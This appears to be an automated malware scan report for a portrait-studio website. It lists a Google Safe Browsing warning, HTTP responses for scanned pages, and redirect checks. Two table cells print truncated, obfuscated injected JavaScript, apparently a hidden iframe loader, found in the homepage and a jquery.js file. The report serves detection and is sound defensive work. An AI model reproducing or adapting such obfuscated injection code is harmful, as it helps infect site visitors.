Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pitterpatterportraits.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.pitterpatterportraits.com/ | 200 OK Content-Length: 7001 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nrt="fr"+"omCh"+"arCo"+"de";if(document.querySelector)ikse=4;myctev=("5f,a5,b4,ad,a2,b3,a8,ae,ad,5f,a8,ab,af,af,6f,78,67,68,5f,ba,4c,49,5f,b5,a0,b1,5f,b2,b3,a0,b3,a8,a2,7c,66,a0,a9,a0,b7,66,7a,4c,49,5f,b5,a0,b1,5f,a2,ae,ad,b3,b1,ae,ab,ab,a4,b1,7c,66,a8,ad,a3,a4,b7,6d,af,a7,af,66,7a,4c,49,5f,b5,a0,b1,5f,a8,ab,af,af,5f,7c,5f,a3,ae,a2,b4,ac,a4,ad,b3,6d,a2,b1,a4,a0,b3,a4,84,ab,a4,ac,a4,ad,b3,67,66,a8,a5,b1,a0,ac,a4,66,68,7a,4c,49,4c,49,5f,a8,ab,af,af,6d,b2,b1,a2,5f,7c,5f,66,a7,b3,b3,af,79,6e,6e,8e,8 Antivirus reports:
| ||
http://www.pitterpatterportraits.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 06 Jan 2015 21:45:53 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.pitterpatterportraits.com/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 06 Jan 2015 21:45:55 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://www.pitterpatterportraits.com/js/jquery.watermark.min.js | 300 Multiple Choices Content-Length: 436 Content-Type: text/html | clean |
http://www.pitterpatterportraits.com/js/jquery.js | 200 OK Content-Length: 95306 Content-Type: application/javascript | suspicious |
Suspicious code found miwcj="y";kululj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[kululj].getElementById("asd"))==null}()}catch(clzhu){gixcrs=function(pbitmu){pbitmu="fr"+"omCh"+pbitmu;for(wrrexa=0;wrrexa<miwcj.length;wrrexa++){etdqq+=String[pbitmu](ckf(ivreq+(miwcj[wrrexa]))-(34));}};};ckf=(window.eval);ivreq="0x";hpfnh=0;try{;}catch(tekpu){hpfnh=1}if(!hpfnh){try{++ckf(kululj)["\x62o"+"d"+miwcj]}catch(clzhu){rjkuvt="^";}miwcj="42^88^97^90^85^96^8b^91^90^42^94^52^5b^4a^4b^42^9d^2f^2 | ||
http://www.pitterpatterportraits.com/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 06 Jan 2015 21:45:58 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://www.pitterpatterportraits.com/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 06 Jan 2015 21:45:59 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pitterpatterportraits.com
Result:
GET / HTTP/1.1
Host: pitterpatterportraits.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pitterpatterportraits.com
Referer: http://www.google.com/search?q=pitterpatterportraits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pitterpatterportraits.com
Referer: http://www.google.com/search?q=pitterpatterportraits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.